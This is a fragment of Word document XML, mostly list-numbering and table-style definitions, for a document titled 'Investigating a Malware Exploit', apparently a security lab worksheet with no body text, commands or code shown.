      <w:rPr>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pP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 xml:space="preserve">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 xml:space="preserve">14</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>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4"/>
      <w:pBdr>
        <w:bottom w:val="single" w:color="000000" w:sz="18" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind/>
      <w:rPr/>
    </w:pPr>
    <w:r/>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w15:appearance w15:val="boundingBox"/>
        <w:id w:val="1735907215"/>
        <w:placeholder>
          <w:docPart w:val="590D3D55688E48DDB6EC995446F5394E"/>
        </w:placeholder>
        <w:rPr/>
      </w:sdtPr>
      <w:sdtContent>
        <w:r>
          <w:t xml:space="preserve">Investigating a Malware Exploit</w:t>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4"/>
      <w:pBdr>
        <w:bottom w:val="single" w:color="000000" w:sz="18" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind/>
      <w:rPr/>
    </w:pPr>
    <w:r/>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w15:appearance w15:val="boundingBox"/>
        <w:id w:val="1236028363"/>
        <w:placeholder>
          <w:docPart w:val="49E5C2A683FF374D8B56395C3A481D78"/>
        </w:placeholder>
        <w:rPr/>
      </w:sdtPr>
      <w:sdtContent>
        <w:r>
          <w:t xml:space="preserve">Investigating a Malware Exploit</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r/>
    <w:r/>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="1099"/>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind w:firstLine="0" w:left="-288"/>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pStyle w:val="1163"/>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="none"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="nothing"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="none"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="nothing"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="none"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="nothing"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="(%5)"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2520"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="(%6)"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2880"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%7."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3240"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%8."/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3600"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%9."/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3960"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="none"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="nothing"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%2."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="360"/>
      </w:pPr>
      <w:pStyle w:val="1182"/>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%3)"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="(%4)"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1440"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="(%5)"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="180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
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="none"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:pStyle w:val="1100"/>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="nothing"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="Part %2:"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:pStyle w:val="1101"/>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="space"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="Step %3:"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:pStyle w:val="1102"/>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="space"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%4."/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:pStyle w:val="1167"/>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%5)"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:pStyle w:val="1175"/>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
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1440"/>
      </w:pPr>
      <w:pStyle w:val="1164"/>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>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4">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="-"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      </w:rPr>
      <w:start w:val="255"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="180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520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="396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680"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val=""/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="612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840"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">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6">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7">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8">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9">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0">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1">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2">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3">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4">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5">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6">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7">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8">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19">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0">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1">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2">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3">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4">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5">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6">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7">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8">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29">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0">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1">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2">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3">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4">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5">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6">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7">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8">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39">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0">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1">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2">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3">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4">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5">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6">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7">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8">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49">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0">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1">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2">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3">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4">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5">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6">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7">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8">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="Part %1:"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="space"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="Task %2:"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="space"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="Step %3:"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="space"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%4."/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%5)"/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="(%6)"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2160"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%7."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2520"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%8."/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2880"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="%9."/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="num" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3240"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="59">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60">
    <w:nsid w:val="6DF503A0"/>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62">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63">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64">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65">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66">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67">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68">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69">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0">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1">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2">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3">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4">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5">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6">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7">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8">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79">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0">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1">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2">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3">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4">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5">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6">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7">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8">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89">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0">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1">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2">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3">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4">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5">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6">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7">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8">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99">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0">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1">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2">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3">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4">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5">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6">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7">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8">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09">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10">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11">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12">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13">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14">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:isLgl w:val="false"/>
        <w:lvlJc w:val="left"/>
        <w:lvlText w:val="Task %2:"/>
        <w:numFmt w:val="decimal"/>
        <w:pPr>
          <w:pBdr/>
          <w:tabs>
            <w:tab w:val="num" w:leader="none" w:pos="0"/>
          </w:tabs>
          <w:spacing/>
          <w:ind w:firstLine="0" w:left="0"/>
        </w:pPr>
        <w:rPr/>
        <w:start w:val="1"/>
        <w:suff w:val="space"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11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28033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57">
    <w:name w:val="Table Grid Light"/>
    <w:basedOn w:val="12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Plain Table 1"/>
    <w:basedOn w:val="12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Plain Table 2"/>
    <w:basedOn w:val="12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Plain Table 3"/>
    <w:basedOn w:val="12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Plain Table 4"/>
    <w:basedOn w:val="12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Plain Table 5"/>
    <w:basedOn w:val="12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1 Light"/>
    <w:basedOn w:val="12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1 Light - Accent 1"/>
    <w:basedOn w:val="12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1 Light - Accent 2"/>
    <w:basedOn w:val="12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1 Light - Accent 3"/>
    <w:basedOn w:val="12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1 Light - Accent 4"/>
    <w:basedOn w:val="12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1 Light - Accent 5"/>
    <w:basedOn w:val="12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1 Light - Accent 6"/>
    <w:basedOn w:val="12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2"/>
    <w:basedOn w:val="12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2 - Accent 1"/>
    <w:basedOn w:val="12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2 - Accent 2"/>
    <w:basedOn w:val="12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2 - Accent 3"/>
    <w:basedOn w:val="12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2 - Accent 4"/>
    <w:basedOn w:val="12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2 - Accent 5"/>
    <w:basedOn w:val="12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2 - Accent 6"/>
    <w:basedOn w:val="12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3"/>
    <w:basedOn w:val="12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3 - Accent 1"/>
    <w:basedOn w:val="12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3 - Accent 2"/>
    <w:basedOn w:val="12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3 - Accent 3"/>
    <w:basedOn w:val="12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3 - Accent 4"/>
    <w:basedOn w:val="12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3 - Accent 5"/>
    <w:basedOn w:val="12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3 - Accent 6"/>
    <w:basedOn w:val="12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4"/>
    <w:basedOn w:val="12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4 - Accent 1"/>
    <w:basedOn w:val="12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4 - Accent 2"/>
    <w:basedOn w:val="12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4 - Accent 3"/>
    <w:basedOn w:val="12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4 - Accent 4"/>
    <w:basedOn w:val="12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4 - Accent 5"/>
    <w:basedOn w:val="12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4 - Accent 6"/>
    <w:basedOn w:val="12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5 Dark"/>
    <w:basedOn w:val="12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5 Dark- Accent 1"/>
    <w:basedOn w:val="12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5 Dark - Accent 2"/>
    <w:basedOn w:val="12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5 Dark - Accent 3"/>
    <w:basedOn w:val="12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5 Dark- Accent 4"/>
    <w:basedOn w:val="12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5 Dark - Accent 5"/>
    <w:basedOn w:val="12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5 Dark - Accent 6"/>
    <w:basedOn w:val="12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6 Colorful"/>
    <w:basedOn w:val="12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99">
    <w:name w:val="Grid Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="12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00">
    <w:name w:val="Grid Table 6 Colorful - Accent 2"/>
    <w:basedOn w:val="12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01">
    <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="12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02">
    <w:name w:val="Grid Table 6 Colorful - Accent 4"/>
    <w:basedOn w:val="12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03">
    <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="12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04">
    <w:name w:val="Grid Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="12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05">
    <w:name w:val="Grid Table 7 Colorful"/>
    <w:basedOn w:val="12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7 Colorful - Accent 1"/>
    <w:basedOn w:val="12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7 Colorful - Accent 2"/>
    <w:basedOn w:val="12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7 Colorful - Accent 3"/>
    <w:basedOn w:val="12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7 Colorful - Accent 4"/>
    <w:basedOn w:val="12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7 Colorful - Accent 5"/>
    <w:basedOn w:val="12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7 Colorful - Accent 6"/>
    <w:basedOn w:val="12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1 Light"/>
    <w:basedOn w:val="12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1 Light - Accent 1"/>
    <w:basedOn w:val="12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1 Light - Accent 2"/>
    <w:basedOn w:val="12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1 Light - Accent 3"/>
    <w:basedOn w:val="12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1 Light - Accent 4"/>
    <w:basedOn w:val="12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1 Light - Accent 5"/>
    <w:basedOn w:val="12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1 Light - Accent 6"/>
    <w:basedOn w:val="12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2"/>
    <w:basedOn w:val="12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2 - Accent 1"/>
    <w:basedOn w:val="12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2 - Accent 2"/>
    <w:basedOn w:val="12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2 - Accent 3"/>
    <w:basedOn w:val="12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2 - Accent 4"/>
    <w:basedOn w:val="12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2 - Accent 5"/>
    <w:basedOn w:val="12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2 - Accent 6"/>
    <w:basedOn w:val="12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3"/>
    <w:basedOn w:val="12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3 - Accent 1"/>
    <w:basedOn w:val="12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3 - Accent 2"/>
    <w:basedOn w:val="12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3 - Accent 3"/>
    <w:basedOn w:val="12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3 - Accent 4"/>
    <w:basedOn w:val="12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3 - Accent 5"/>
    <w:basedOn w:val="12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3 - Accent 6"/>
    <w:basedOn w:val="12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4"/>
    <w:basedOn w:val="12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4 - Accent 1"/>
    <w:basedOn w:val="12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4 - Accent 2"/>
    <w:basedOn w:val="12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4 - Accent 3"/>
    <w:basedOn w:val="12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4 - Accent 4"/>
    <w:basedOn w:val="12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4 - Accent 5"/>
    <w:basedOn w:val="12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4 - Accent 6"/>
    <w:basedOn w:val="12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5 Dark"/>
    <w:basedOn w:val="12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1">
    <w:name w:val="List Table 5 Dark - Accent 1"/>
    <w:basedOn w:val="12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2">
    <w:name w:val="List Table 5 Dark - Accent 2"/>
    <w:basedOn w:val="12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3">
    <w:name w:val="List Table 5 Dark - Accent 3"/>
    <w:basedOn w:val="12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4">
    <w:name w:val="List Table 5 Dark - Accent 4"/>
    <w:basedOn w:val="12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5">
    <w:name w:val="List Table 5 Dark - Accent 5"/>
    <w:basedOn w:val="12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6">
    <w:name w:val="List Table 5 Dark - Accent 6"/>
    <w:basedOn w:val="12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7">
    <w:name w:val="List Table 6 Colorful"/>
    <w:basedOn w:val="12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6 Colorful - Accent 1"/>
    <w:basedOn w:val="12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6 Colorful - Accent 2"/>
    <w:basedOn w:val="12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6 Colorful - Accent 3"/>
    <w:basedOn w:val="12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6 Colorful - Accent 4"/>
    <w:basedOn w:val="12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6 Colorful - Accent 5"/>
    <w:basedOn w:val="12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6 Colorful - Accent 6"/>
    <w:basedOn w:val="12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7 Colorful"/>
    <w:basedOn w:val="12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55">
    <w:name w:val="List Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="12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56">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="12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057">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="12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058">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="12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059">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="12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060">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="12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061">
    <w:name w:val="Lined - Accent"/>
    <w:basedOn w:val="12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ned - Accent 1"/>
    <w:basedOn w:val="12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ned - Accent 2"/>
    <w:basedOn w:val="12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ned - Accent 3"/>
    <w:basedOn w:val="12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ned - Accent 4"/>
    <w:basedOn w:val="12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ned - Accent 5"/>
    <w:basedOn w:val="12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ned - Accent 6"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 1"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 2"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 3"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 4"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 5"/>
    <w:basedOn w:val="12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Bordered &amp; Lined - Accent 6"/>
    <w:basedOn w:val="12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Bordered"/>
    <w:basedOn w:val="12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Bordered - Accent 1"/>
    <w:basedOn w:val="12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Bordered - Accent 2"/>
    <w:basedOn w:val="12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Bordered - Accent 3"/>
    <w:basedOn w:val="12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Bordered - Accent 4"/>
    <w:basedOn w:val="12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Bordered - Accent 5"/>
    <w:basedOn w:val="12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Bordered - Accent 6"/>
    <w:basedOn w:val="12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2">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1083"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1083">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1082"/>
